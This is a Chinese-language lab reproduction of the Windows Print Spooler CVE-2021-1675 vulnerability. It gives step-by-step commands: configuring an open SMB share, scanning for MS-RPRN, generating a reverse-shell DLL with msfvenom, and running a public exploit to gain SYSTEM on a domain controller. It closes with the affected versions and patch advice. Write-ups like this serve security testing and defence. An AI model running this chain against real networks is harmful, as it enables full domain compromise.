Windows Print Spooler CVE-2021-1675 漏洞复现
Created: July 7, 2021 5:25 PM
漏洞描述
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
利用条件
域环境 域内用户 开启Spooler打印功能
复现环境
域控:Windows server 2016 IP:192.168.10.10
攻击机:Kali 2020 IP:192.168.10.2
漏洞利用
0X01. 添加域控的普通账号。
0X02. 由于Kali中impacket版本过低需安装更高版本的impacket网络协议工具包
> sudo pip3 uninstall impacket
git clone [https://github.com.cnpmjs.org/cube0x0/impacket](https://github.com.cnpmjs.org/cube0x0/impacket)
cd impacket
sudo python3 ./setup.py install
0X03. 攻击机需开启SMB服务并创建共享目录tmp,以便上传木马至域控中
在Kali中编辑 ”/etc/samba/smb.conf" ,修改以下配置
> [global]
workgroup = WORKGROUP
log file = /var/log/samba/log.%m
max log size = 1000
security = user
server role = standalone server
map to guest = bad user
usershare allow guests = yes
[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes
重启SMB服务
> systemctl restart smbd.service
测试Kali上的SMB服务能否访问
0X04. 通过impacket中的rpcdump.py扫描目标机是否存在漏洞
> python3 rpcdump.py @192.168.10.10 | grep MS-RPRN
如图所示,工具扫描结果显示服务器经过扫描存在漏洞
0X05. 在共享目录tmp下通过msfvenom生成.dll文件木马
> msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.10.2 lport=9999 -f dll -o reverse.dll
0X06. 通过MSF中的"exploit/multi/handler"监听模块,建立监听
0X07. 通过使用EXP进行利用
> EXP:[https://github.com/cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675)
> python3 CVE-2021-1675.py vu1n:Passw0rd@192.168.10.10 '\\192.168.10.2\smb\reverse.dll'
0X08. 成功反弹shell并获取到域控system权限,利用成功。
0X09. 在受害机中可以通过"Process Hacker"查看相关的进程
0X10. 利用成功之后spooler服务会自动关闭。
影响范围
> Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
安全建议
安装微软CVE-2021-1675漏洞补丁
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
在服务应用(services.msc)中找到Print Spooler服务,将“启动类型”修改为“禁用”